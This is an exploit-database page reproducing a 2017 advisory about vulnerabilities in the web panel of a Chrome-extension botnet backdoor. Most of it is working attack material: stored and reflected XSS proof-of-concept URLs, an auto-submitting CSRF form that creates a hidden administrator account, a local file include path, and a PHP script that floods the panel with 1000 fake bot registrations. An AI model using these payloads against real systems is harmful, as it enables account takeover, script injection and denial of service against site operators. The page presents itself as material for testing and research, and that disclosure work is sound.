Advertisement






botnet graniet chrome backdoor v3.0 web panel multi vulnerability

CVE Category Price Severity
N/A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-01-21
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010177

Below is a copy:

botnet graniet chrome backdoor v3.0 web panel multi vulnerability# Exploit Title: botnet graniet chrome backdoor v3.0 web panel multi vulnerability
# Date: 10-1-2017
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link:https://github.com/graniet/chromebackdoor
# Tested on:any os


1- cross site scripting

There are many xss vulnerability at graniet chrome backdoor
some of them
stored xss:
POC:
http://localhost/backdoor/web/gate.php?add=<h1>test</h1>&version=<script>alert(/xss/);</script>
this POC add Bots with xss payload so when admin open admin panel the xss code will execute
image of POC:
https://s30.postimg.org/hdngwgxlt/Screenshot_from_2017_01_10_18_27_10.png
image of source code 
https://s27.postimg.org/lwk1jwijn/Screenshot_from_2017_01_10_18_44_22.png

reflected xss:
POC:
http://localhost/backdoor/web/index.php?action=info&id=1'></a><script>alert(/xxs/);</script>
image of source code
https://s27.postimg.org/3v0wm3oir/Screenshot_from_2017_01_10_18_45_54.png

2- csrf add user administrator
<body onload="document.alqnas.submit()">
<form action="http://localhost/backdoor/web/index.php?action=settings#" method="post" name="alqnas">
<input type="hidden" name="username" value="admin-hacker" />
<input type="hidden" name="password" value="hacker-pass"  />
<input type="hidden" name="role" value="0" />
<input type="hidden" name="add_user" value="Add user" />
</form>
</body>
image of request
https://s27.postimg.org/5j020r2eb/Screenshot_from_2017_01_10_18_43_49.png

3- local file include
http://localhost/backdoor/web/index.php?action=../../relais
image of source code
https://s27.postimg.org/4yl0y295v/Screenshot_from_2017_01_10_18_50_49.png

4- ddos add bots

<?php
   function addbots($url)
{
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $output=curl_exec($ch);
    curl_close($ch);
}
//1000 are numbers you will send it
$i =1;
while ( $i <=1000){
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
                //change localhost to url of bot
addbots("http://localhost/backdoor/web/gate.php?add=$rand&version=$shuf");
   $i++;
}
?>


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum